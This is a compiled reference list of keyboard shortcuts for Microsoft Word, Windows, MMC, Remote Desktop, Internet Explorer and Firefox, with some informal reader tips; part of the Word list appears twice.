Double underlines the selection (toggle)
34
Alt R, G
DrawGroup
Groups the selected drawing objects
35
Alt R, I
DrawSnapToGrid
Sets up a grid for aligning drawing objects
36
Alt R, U
DrawUngroup
Ungroups the selected group of drawing objects
37
Ctrl+Shift+F5 (Or: Alt I, K)
EditBookmark
Brings up the bookmark dialog
38
Del
EditClear
Performs a forward delete or removes the selection without putting it on the Clipboard
39
Ctrl+C
EditCopy
Copies the selection and puts it on the Clipboard
40
Ctrl+X
EditCut
Cuts the selection and puts it on the Clipboard
41
Ctrl+F
EditFind
Finds the specified text or the specified formatting
42
F5, Ctrl+G
EditGoTo
Jumps to a specified place in the active document
43
Alt E, K
EditLinks
Allows links to be viewed, updated, opened, or removed
44
Ctrl+V
EditPaste
Inserts the Clipboard contents at the insertion point
45
Alt E, S
EditPasteSpecial
Inserts the Clipboard contents as a linked object, embedded object, or other format
46
Alt + Shift + Backspc
EditRedo
Redoes the last action that was undone
47
F4
EditRedoOrRepeat
Repeats the last command, or redoes the last action that was undone (unfortunately, doesn't work for as many commands in Word 2000 as in Word 97 and below, but this is still one of Word's most useful shortcuts, if not the most useful)
48
Ctrl+H
EditReplace
Finds the specified text or the specified formatting and replaces it
49
Ctrl+A
EditSelectAll
Selects the entire document
50
Ctrl+Z
EditUndo
Reverses the last action
51
Alt + PageDn (to select to end of column, use Alt + Shift + PgDn)
EndOfColumn
Moves to the last cell in the current table column
52
Ctrl+Shift+End
EndOfDocExtend
Extends the selection to the end of the last line of the document
53
Ctrl+End
EndOfDocument
Moves the insertion point to the end of the last line of the document
54
End
EndOfLine
Moves the insertion point to the end of the current line
55
Shift+End
EndOfLineExtend
Extends the selection to the end of the current line
56
Alt+End
EndOfRow
Moves to the last cell in the current row
57
Alt + Ctrl + PgDn
EndOfWindow
Moves the insertion point to the end of the last visible line on the screen
58
Shift + Alt + Ctrl + PgDn
EndOfWindowExtend
Extends the selection to the end of the last visible line on the screen
59
F8 (press Esc to turn off)
ExtendSelection
Turns on extend selection mode and then expands the selection with the direction keys
60
Alt + F4 (<9>)
FileCloseOrExit
Closes the current document, or if no documents are open, quits Word. Horrible command, as it makes it a long winded business to quit Word. But there's a simple solution - assign Alt+F4 to FileExit instead.
61
Alt + F4 (Word 97)
FileExit
Quits Microsoft Word and prompts to save the documents (does intercept the menu item, but not the keyboard shortcut, or the x button. An AutoExit macro is usually a better way of intercepting this).
62
NOT Ctrl+N!!
FileNew
Creates a new document or template (brings up the dialog). Note that: Word pretends that Ctrl+N is assigned to FileNew but it isn't, it's assigned to FileNewDefault You can fix this in Word 2000 by assigning Ctrl+N to the FileNewDialog command. In Word 97 the only way to fix it is to create a macro called FileNew (to do this, press Alt + F8, type "FileNew" without the quotes and Click "Create". The macro will automatically contain the code needed to make it work).
63
Ctrl+N
FileNewDefault
Creates a new document based on the Normal template.
64
Ctrl+O
FileOpen
Opens an existing document or template
65
Alt F, U
FilePageSetup
Changes the page setup of the selected sections
66
Ctrl + P
FilePrint
Prints the active document (brings up the dialog)
67
Ctrl+F2
FilePrintPreview
Displays full pages as they will be printed
68
Alt F, I
FileProperties
Shows the properties of the active document
69
Ctrl+S
FileSave
FileSave
70
Alt F, A (or F12)
FileSaveAs
Saves a copy of the document in a separate file (brings up the dialog)
71
Ctrl+Shift+F
Font
Activates the Fonts listbox on the formatting toolbar
72
Ctrl+Shift+P
FontSizeSelect
Activates the Font Size drop-down on the formatting toolbar
73
Alt + Ctrl + K
FormatAutoFormat
Automatically formats a document (or sometimes, automatically screws it up)
74
Alt O, B
FormatBordersAndSha ding
Changes the borders and shading of the selected paragraphs, table cells, and pictures
75
Alt O, E
FormatChangeCase
Changes the case of the letters in the selection
76
Alt O, C
FormatColumns
Changes the column format of the selected sections (brings up the dialog)
77
Alt O, D
FormatDropCap
Formats the first character of current paragraph as a dropped capital (must select it first)
78
Ctrl+D
FormatFont
Brings up the Format + Font dialog
79
Alt + Shift + R
FormatHeaderFooterL ink
Links the current header/footer to the previous section (but does not intercept the button on the Header Footer toolbar)
80
Alt O, P
FormatParagraph
Brings up the Format Paragraph dialog
81
Alt O, S
FormatStyle
Applies, creates, or modifies styles
82
Alt O, T
FormatTabs
Brings up the Format Tabs dialog
83
Shift + F5
GoBack
Returns to the previous insertion point (goes back to up to 3 points, then returns to where you started; this is one of the most useful shortcuts of them all. Also useful when opening a document, if you want to g straight to where you were last editing it)
84
Ctrl + >
GrowFont
Increases the font size of the selection
85
Ctrl + ]
GrowFontOnePoint
Increases the font size of the selection by one point
86
Ctrl + T (or drag the ruler)
HangingIndent
Increases the hanging indent
87
F1
Help
Microsoft Word Help
88
Shift + F1
HelpTool
Lets you get help on a command or screen region or examine text properties
89
Ctrl + Shift + H
Hidden
Makes the selection hidden text (toggle)
90
Click on it
HyperlinkOpen
Connect to a hyperlink's address
91
Ctrl + M (or drag the ruler)
Indent
Moves the left indent to the next tab stop
92
Alt + Ctrl + M (or Alt I, M)
InsertAnnotation
Inserts a comment
93
F3
InsertAutoText
Replaces the name of the AutoText entry with its contents
94
Alt I, B
InsertBreak
Ends a page, column, or section at the insertion point
95
Alt I, C
InsertCaption
Inserts a caption above or below a selected object
96
Ctrl + Shift + Return
InsertColumnBreak
Inserts a column break at the insertion point
97
Alt + Shift + D
InsertDateField
Inserts a date field
98
Alt + Ctrl + D
InsertEndnoteNow
Inserts an endnote reference at the insertion point without displaying the dialog
99
Alt I, F
InsertField
Inserts a field in the active document
100
Ctrl+F9
InsertFieldChars
Inserts an empty field with the enclosing field characters
101
Alt I, L
InsertFile
Inserts the text of another file into the active document
102
Alt I, N
InsertFootnote
Inserts a footnote or endnote reference at the insertion point
103
Alt + Ctrl + F
InsertFootnoteNow
Inserts a footnote reference at the insertion point without displaying the dialog
104
Ctrl + K
InsertHyperlink
Insert Hyperlink
105
Alt I, D
InsertIndexAndTable s
Inserts an index or a table of contents, figures, or authorities into the document
106
Alt + Ctrl + L
InsertListNumField
Inserts a ListNum Field
107
Alt + Shift + F
InsertMergeField
Brings up a dialog to insert a mail merge field at the insertion point. (It does not intercept the button on the Mail merge. toolbar)
108
Ctrl + Return
InsertPageBreak
Inserts a page break at the insertion point
109
Alt + Shift + P
InsertPageField
Inserts a page number field
110
Ctrl + Shift + F3
InsertSpike
Empties the spike AutoText entry and inserts all of its contents into the document
111
Alt + Shift + T
InsertTimeField
Inserts a time field
112
Ctrl + I
Italic
Makes the selection italic (toggle)
113
Ctrl + J
JustifyPara
Aligns the paragraph at both the left and the right indent
114
Ctrl + L
LeftPara
Aligns the paragraph at the left indent
115
Down arrow
LineDown
Moves the insertion point down one line
116
Shift + down arrow
LineDownExtend
Extends the selection down one line
117
Up arrow
LineUp
Moves the insertion point up one line
118
Shift + up arrow
LineUpExtend
Extends the selection up one line
119
Ctrl + F11
LockFields
Locks the selected fields to prevent updating
120
Alt + Shift + K
MailMergeCheck
Checks for errors in a mail merge
121
Alt+Shift+E
MailMergeEditDataSo urce
Lets you edit a mail merge data source
122
Alt + Shift + N
MailMergeToDoc
Collects the results of the mail merge in a document
123
Alt Shift + M
MailMergeToPrinter
Sends the results of the mail merge to the printer
124
Alt + Shift + I
MarkCitation
Marks the text you want to include in the table of authorities
125
Alt + Shift + X
MarkIndexEntry
Marks the text you want to include in the index
126
Alt + Shift + O
MarkTableOfContents Entry
Inserts a TC field (but it is far better to use Heading Styles to generate your Table of Contents instead)
127
Alt or F10
MenuMode
Makes the menu bar active
128
Alt + Shift + F11
MicrosoftScriptEdit or
Starts or switches to Microsoft Development Environment application, allowing you to view the HTML/XML source code that would be behind the document if it were in ..htm format (or that is behind it if it already is in .htm format).
129
Alt + Ctrl + F1
MicrosoftSystemInfo
Execute the Microsoft System Info application
130
F2
MoveText
Moves the selection to a specified location without using the clipboard (press Return to execute the more)
131
Tab
NextCell
Moves to the next table cell
132
F11
NextField
Moves to the next field
133
Alt + F7
NextMisspelling
Find next spelling error
134
Alt + down arrow
NextObject
Moves to the next object on the page
135
Ctrl + F6
NextWindow
Switches to the next document window, equivalent to selecting a document from the Window menu.
136
Ctrl+Shift+N
NormalStyle
Applies the Normal style
137
Ctrl + 0
OpenOrCloseUpPara
Sets or removes extra spacing above the selected paragraph
138
F6
OtherPane
Switches to another window pane in Normal View (for instance, if you have if you have a Footnotes pane open in Normal view and want to switch to the main document and back without closing the pane).
139
Alt + _
OutlineCollapse
Collapses an Outline in Outline View by one level
140
Alt+Shift+rt arrow
OutlineDemote
Demotes the selected paragraphs one heading level
141
Alt + +
OutlineExpand
Expands an Outline in Outline View by one level
142
Alt+Shift+down arrow
OutlineMoveDown
Moves the selection below the next item in the outline
143
Alt+Shift+up arrow
OutlineMoveUp
Moves the selection above the previous item in the outline
144
Alt+Shift+left arrow
OutlinePromote
Promotes the selected paragraphs one heading level
145
Alt + Shift + L
OutlineShowFirstLin e
Toggles between showing the first line of each paragraph only or showing all of the body text in the outline
146
Ins
Overtype
Toggles the typing mode between replacing and inserting
147
PgDn
PageDown
Moves the insertion point and document display to the next screen of text
148
Shift+ PgDn
PageDownExtend
Extends the selection and changes the document display to the next screen of text
149
PgUp
PageUp
Moves the insertion point and document display to the previous screen of text
150
Shift + PgUp
PageUpExtend
Extends the selection and changes the document display to the previous screen of text
151
Ctrl + down arrow
ParaDown
Moves the insertion point to the beginning of the next paragraph
152
Shift + Ctrl + down arrow
ParaDownExtend
Extends the selection to the beginning of the next paragraph
153
Ctrl + up arrow
ParaUp
Moves the insertion point to the beginning of the previous paragraph
154
Shift + Ctrl + up arrow
ParaUpExtend
Extends the selection to the beginning of the previous paragraph
155
Ctrl+Shift+V
PasteFormat
Applies the previously copied formatting to selection
156
Shift + Tab
PrevCell
Moves to the previous table cell
157
Shift + F11
PrevField
Moves to the previous field
158
Alt + up arrow
PrevObject
Moves to the previous object on the page
159
Ctrl + Shift + F6
PrevWindow
Switches back to the previous document window
160
Sfift+F4
RepeatFind
Repeats Go To or Find to find the next occurrence
161
Ctrl+Spacebar
ResetChar
Makes the selection the default character format of the applied style
162
Ctrl+Q
ResetPara
Makes the selection the default paragraph format of the applied style
163
Ctrl +R
RightPara
Aligns the paragraph at the right indent
164
Ctrl + *
ShowAll
Shows/hides all nonprinting characters
165
Alt + Shift + A
ShowAllHeadings
Displays all of the heading levels and the body text in Outline View
166
Ctrl + <
ShrinkFont
Decreases the font size of the selection
167
Ctrl + [
ShrinkFontOnePoint
Decreases the font size of the selection by one point
168
Ctrl + Shift + K
SmallCaps
Makes the selection small capitals (toggle)
169
Ctrl + 1
SpacePara1
Sets the line spacing to single space
170
Ctrl + 5
SpacePara15
Sets the line spacing to one-and-one- half space
171
Ctrl + 2
SpacePara2
Sets the line spacing to double space
172
Ctrl + F3
Spike
Deletes the selection and adds it to the "Spike" AutoText entry (which allows you to move text and graphics from nonadjacent locations)
173
Alt + PgUp
StartOfColumn
Moves to the first cell in the current column
174
Ctrl+Shift+Home
StartOfDocExtend
Extends the selection to the beginning of the first line of the document
175
Ctrl +Home
StartOfDocument
Moves the insertion point to the beginning of the first line of the document
176
Home
StartOfLine
Moves the insertion point to the beginning of the current line
177
Shift+Home
StartOfLineExtend
Extends the selection to the beginning of the current line
178
Alt+Home
StartOfRow
Moves to the first cell in the current row
179
Alt+Ctrl+PgUp
StartOfWindow
Moves the insertion point to the beginning of the first visible line on the screen
180
Shift+ Alt+Ctrl+PgUp
StartOfWindowExtend
Extends the selection to the beginning of the first visible line on the screen
181
Strl + Shift + S
Style
Activates the Style drop-down on the Formatting toolbar
182
Ctrl + =
Subscript
Makes the selection subscript (toggle)
183
Ctrl + +
Superscript
Makes the selection superscript (toggle)
184
Ctrl + Shift + Q
SymbolFont
Applies the Symbol font to the selection
185
Alt A, F
TableAutoFormat
Applies a set of formatting to a table
186
Alt A, H
TableHeadings
Toggles table headings attribute on and off
187
Alt + click
(Alt + drag to select several)
TableSelectColumn
Selects the current column in a table
188
Click in left margin
TableSelectRow
Selects the current row in a table
189
Alt + double-click
TableSelectTable
Selects an entire table
190
Alt + Ctrl + U
TableUpdateAutoForm at
Updates the table formatting to match the applied Table Autoformat settings
191
Shift + F9 (Alt + F9 toggles all field codes on or off)
ToggleFieldDisplay
Shows the field codes or the results for the selection (toggle)
192
Alt T, C
ToolsCustomize
Allows you to customizes the Word user interface (menus, keyboard and toolbars) and store the customizations in a template (defaults to Normal.dot, so be careful!)
193
Alt + F8
ToolsMacro
Runs, creates, deletes, or revises a macro
194
F7
ToolsProofing
Checks the spelling and grammar in the active document
195
Ctr.l + Shift + E
ToolsRevisionMarksT oggle
Toggles track changes for the active document
196
Shift + F7
ToolsThesaurus
Finds a synonym for the selected word
197
Ctrl+U
Underline
Formats the selection with a continuous underline (toggle)
198
Ctrl + Shift + T
(or drag the ruler)
UnHang
Decreases the hanging indent
199
Ctrl + Shift + M
(or drag the ruler)
UnIndent
Moves the left indent to the previous tab stop
200
Ctrl+Shift+F9
UnlinkFields
Permanently replaces the field codes with the results
201
Ctrl + Shift + F11
UnlockFields
Unlocks the selected fields for updating
202
F9
UpdateFields
Updates and displays the results of the selected fields
203
Ctrl + Shiift + F7
UpdateSource
Copies the modified text of a linked file back to its source file
204
Hover over comment
ViewAnnotations
Show or hide the comment pane
205
Dbl-click the endnote reference
ViewEndnoteArea
If in Normal View, opens a pane for viewing and editing the endnote (toggle). If in Page/Print Layout View, switches from the body text to the endnote or vice versa
206
At + F9
ViewFieldCodes
Shows the field codes or results for all fields (toggle)
207
Dbl-click the footnote reference
ViewFootnoteArea
If in Normal View, opens a pane for viewing and editing the footnote (toggle). If in Page/Print Layout View, switches from the body text to the footnote or vice versa.
208
Alt V, F
ViewFootnotes
If in Normal View, opens a pane for viewing and editing footnotes and endnotes (toggle). If in Page/Print Layout View, switches from the body text to the footnotes/endnotes or vice versa.
209
Alt V, H
ViewHeader
Displays header in page layout view
210
Alt V, N
(or Alt + Ctrl + N)
ViewNormal
Changes the editing view to normal view
211
Alt V, O
(or Alt + Ctrl + O)
ViewOutline
Displays a document's outline
212
Alt V, P
(or Alt + Ctrl + P)
ViewPage
Displays the page more-or-less as it will be printed, and allows editing (In Word 2000 the menu item is called Print Layout, but fortunately the command hasn't changed.
213
Alt + F11
ViewVBCode
Shows the VB editing environment (Tools + Macro + Visual Basic Editor)
214
Alt + left arrow
WebGoBack
Backward hyperlink (useful if you clicked on a page number hyperlink in the table of contents and then want to return to the TOC)
215
Alt + rt arrow
WebGoForward
Forward hyperlink
216
Alt W, A
WindowArrangeAll
Arranges windows as non-overlapping tiles
217
Ctrl + left arrow
WordLeft
Moves the insertion point to the left one word
218
Shift + Ctrl + left arrow
WordLeftExtend
Extends the selection to the left one word
219
Ctrl + rt arrow
WordRight
Moves the insertion point to the right one word
220
Shift + Ctrl + rt arrow
WordRightExtend
Extends the selection to the right one word
221
Ctrl + Shift + W
WordUnderline
Underlines the words but not the spaces in the selection (toggle)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Nor mal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the m*cro$oft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Internet Explorer navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CTRL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)
In IE… you can press ALT+D > Address Bar… with Alt you have all the stuff..
ALT+SPACEBAR (Open the shortcut menu for the active window)
ALT+SPACEBAR (Display the System menu for the active window)
ALT+SPACEBAR is a good one.
Try these alt-spacebar combos:
-alt + spacebar + n = Shrink (minimize) current window
-alt + spacebar + x = Maximize current window
-this one has saved my ass before quite a few times
-alt + spacebar + m = Move current windows with arrow keys
Also, don’t forget for internet browsing, in IE, typing in hongkiat, and then pressing CTRL-Enter fills in the www, and the .com, and if you use Firefox, Ctrl=Shift-Enter adds .org, and shift-enter fills in .net, saves me a lot of time every day right there.
Crtl + Insert = Copy
Shift + Insert = Paste
-alt + spacebar + m = Move current windows with arrow keys
CTRL+D
Minimizes all windows and displays desktop. If you repeat it, all windows maximize again the way they were.
alt + spacebar + m = Move current windows with arrow keys
CTRL+Shift+ESC opens the Taskmanager :)
windows + L actually logs you off,it doesn’t lock the keyboard.
CTRL+SPACEBAR+C or CTRL+W to close active window/programs.
Ctrl-Shift (and the plus sign on the Num pad)
Windows Keyboard Shortcuts for Mozilla Firefox
CTRL + A Select all text on a webpage
CTRL + B Open the Bookmarks sidebar
CTRL + C Copy the selected text to the Windows clipboard
CTRL + D Bookmark the current webpage
CTRL + F Find text within the current webpage
CTRL + G Find more text within the same webpage
CTRL + H Opens the webpage History sidebar
CTRL + I Open the Bookmarks sidebar
CTRL + J Opens the Download Dialogue Box
CTRL + K Places the cursor in the Web Search box ready to type your search
CTRL + L Places the cursor into the URL box ready to type a website address
CTRL + M Opens your mail program (if you have one) to create a new email message
CTRL + N Opens a new Firefox window
CTRL + O Open a local file
CTRL + P Print the current webpage
CTRL + R Reloads the current webpage
CTRL + S Save the current webpage on your PC
CTRL + T Opens a new Firefox Tab
CTRL + U View the page source of the current webpage
CTRL + V Paste the contents of the Windows clipboard
CTRL + W Closes the current Firefox Tab or Window (if more than one tab is open)
CTRL + X Cut the selected text
CTRL + Z Undo the last action
Windows Keyboard Shortcuts for Mozilla Firefox (Function keys)
F1 Opens Firefox help
F3 Find more text within the same webpage
F5 Reload the current webpage
F6 Toggles the cursor between the address/URL input box and the current webpage
F7 Toggles Caret Browsing on and off. Used to be able to select text on a webpage with the keyboard
F11 Switch to Full Screen mode
221 Microsoft Word Shortcuts - 1
1
Ctrl + Shift + A
AllCaps
Makes the selection all capitals (toggle)
2
Alt + Ctrl + 1
ApplyHeading1
Applies Heading 1 style to the selected text
3
Alt + Ctrl + 2
ApplyHeading2
Applies Heading 2 style to the selected text
4
Alt + Ctrl + 3
ApplyHeading3
Applies Heading 3 style to the selected text
5
Ctrl + Shift + L
ApplyListBullet
Applies List Bullet style to the selected text
6
Alt + F10
AppMaximize
Enlarges the application window to full size
7
Alt + F5
AppRestore
Restores the application window to normal size
8
Ctrl+B
Bold
Makes the selection bold (toggle)
9
Ctrl + PgDn
BrowseNext
Jump to the next browse object
10
Ctrl + PgUp
BrowsePrev
Jump to the previous browse object
11
Alt + Ctrl + Home
BrowseSel
Select the next/prev browse object
12
Esc
Cancel
Terminates an action
13
Ctrl+E
CenterPara
Centers the paragraph between the indents
14
Shift+F3
ChangeCase
Changes the case of the letters in the selection
15
Left arrow
CharLeft
Moves the insertion point to the left one character
16
Shift + Left arrow
CharLeftExtend
Extends the selection to the left one character
17
Rt arrow
CharRight
Moves the insertion point to the right one character
18
Shift + Rt arrow
CharRightExtend
Extends the selection to the right one character
19
Alt + Shift + C
ClosePane
Closes the active window pane (if you are in Normal View and have, for example, the Footnote pane open)
20
Alt+Drag (or press Ctrl + Shift + F8 and drag, but Alt + Drag is far easier!)
ColumnSelect
Selects a columnar block of text
21
Ctrl +Shift+C
CopyFormat
Copies the formatting of the selection
22
Shift + F2
CopyText
Makes a copy of the selection without using the clipboard (press Return to paste)
23
Alt + F3
CreateAutoText
Adds an AutoText entry to the active template
24
Ctrl+ Backspace
DeleteBackWord
Deletes the previous word without putting it on the Clipboard
25
Ctrl + Del
DeleteWord
Deletes the next word without putting it on the Clipboard
26
Ctrl+W, Ctrl+F4
DocClose
Prompts to save the document and then closes the active window. (But doesn't intercept the menu command)
27
Ctrl + F10
DocMaximize
Enlarges the active window to full size
28
Ctrl + F7
DocMove
Changes the position of the active window
29
Ctrl + F5
DocRestore
Restores the window to normal size
30
Ctrl + F8
DocSize
Changes the size of the active window
31
Alt + Ctrl + S
DocSplit
Splits the active window horizontally and then adjusts the split
32
Alt + Shift + F9
DoFieldClick
Executes the action associated with macrobutton fields
33
Ctrl + Shift + D
DoubleUnderline
Double underlines the selection (toggle)
34
Alt R, G
DrawGroup
Groups the selected drawing objects
35
Alt R, I
DrawSnapToGrid
Sets up a grid for aligning drawing objects
36
Alt R, U
DrawUngroup
Ungroups the selected group of drawing objects
37
Ctrl+Shift+F5 (Or: Alt I, K)
EditBookmark
Brings up the bookmark dialog
38
Del
EditClear
Performs a forward delete or removes the selection without putting it on the Clipboard
39
Ctrl+C
EditCopy
Copies the selection and puts it on the Clipboard
40
Ctrl+X
EditCut
Cuts the selection and puts it on the Clipboard
41
Ctrl+F
EditFind
Finds the specified text or the specified formatting
42
F5, Ctrl+G
EditGoTo
Jumps to a specified place in the active document
43
Alt E, K
EditLinks
Allows links to be viewed, updated, opened, or removed
44
Ctrl+V
EditPaste
Inserts the Clipboard contents at the insertion point
45
Alt E, S
EditPasteSpecial
Inserts the Clipboard contents as a linked object, embedded object, or other format
46
Alt + Shift + Backspc
EditRedo
Redoes the last action that was undone
47
F4
EditRedoOrRepeat
Repeats the last command, or redoes the last action that was undone (unfortunately, doesn't work for as many commands in Word 2000 as in Word 97 and below, but this is still one of Word's most useful shortcuts, if not the most useful)
48
Ctrl+H
EditReplace
Finds the specified text or the specified formatting and replaces it
49
Ctrl+A
EditSelectAll
Selects the entire document
50
Ctrl+Z
EditUndo
Reverses the last action
51
Alt + PageDn (to select to end of column, use Alt + Shift + PgDn)
EndOfColumn
Moves to the last cell in the current table column
52
Ctrl+Shift+End
EndOfDocExtend
Extends the selection to the end of the last line of the document
53
Ctrl+End
EndOfDocument
Moves the insertion point to the end of the last line of the document
54
End
EndOfLine
Moves the insertion point to the end of the current line
55
Shift+End
EndOfLineExtend
Extends the selection to the end of the current line
56
Alt+End
EndOfRow
Moves to the last cell in the current row
57
Alt + Ctrl + PgDn
EndOfWindow
Moves the insertion point to the end of the last visible line on the screen
58
Shift + Alt + Ctrl + PgDn
EndOfWindowExtend
Extends the selection to the end of the last visible line on the screen
59
F8 (press Esc to turn off)
ExtendSelection
Turns on extend selection mode and then expands the selection with the direction keys
60
Alt + F4 (<9>)
FileCloseOrExit
Closes the current document, or if no documents are open, quits Word. Horrible command, as it makes it a long winded business to quit Word. But there's a simple solution - assign Alt+F4 to FileExit instead.
61
Alt + F4 (Word 97)
FileExit
Quits Microsoft Word and prompts to save the documents (does intercept the menu item, but not the keyboard shortcut, or the x button. An AutoExit macro is usually a better way of intercepting this).
62
NOT Ctrl+N!!
FileNew
Creates a new document or template (brings up the dialog). Note that: Word pretends that Ctrl+N is assigned to FileNew but it isn't, it's assigned to FileNewDefault You can fix this in Word 2000 by assigning Ctrl+N to the FileNewDialog command. In Word 97 the only way to fix it is to create a macro called FileNew (to do this, press Alt + F8, type "FileNew" without the quotes and Click "Create". The macro will automatically contain the code needed to make it work).
63
Ctrl+N
FileNewDefault
Creates a new document based on the Normal template.
64
Ctrl+O
FileOpen
Opens an existing document or template
65
Alt F, U
FilePageSetup
Changes the page setup of the selected sections
66
Ctrl + P
FilePrint
Prints the active document (brings up the dialog)
67
Ctrl+F2
FilePrintPreview
Displays full pages as they will be printed
68
Alt F, I
FileProperties
Shows the properties of the active document
69
Ctrl+S
FileSave
FileSave
70
Alt F, A (or F12)
FileSaveAs
Saves a copy of the document in a separate file (brings up the dialog)
71
Ctrl+Shift+F
Font
Activates the Fonts listbox on the formatting toolbar
72
Ctrl+Shift+P
FontSizeSelect
Activates the Font Size drop-down on the formatting toolbar
73
Alt + Ctrl + K
FormatAutoFormat
Automatically formats a document (or sometimes, automatically screws it up)
74
Alt O, B
FormatBordersAndSha ding
Changes the borders and shading of the selected paragraphs, table cells, and pictures
75
Alt O, E
FormatChangeCase
Changes the case of the letters in the selection
76
Alt O, C
FormatColumns
Changes the column format of the selected sections (brings up the dialog)
77
Alt O, D
FormatDropCap
Formats the first character of current paragraph as a dropped capital (must select it first)
78
Ctrl+D
FormatFont
Brings up the Format + Font dialog
79
Alt + Shift + R
FormatHeaderFooterL ink
Links the current header/footer to the previous section (but does not intercept the button on the Header Footer toolbar)
80
Alt O, P
FormatParagraph
Brings up the Format Paragraph dialog
81
Alt O, S
FormatStyle
Applies, creates, or modifies styles
82
Alt O, T
FormatTabs
Brings up the Format Tabs dialog
83
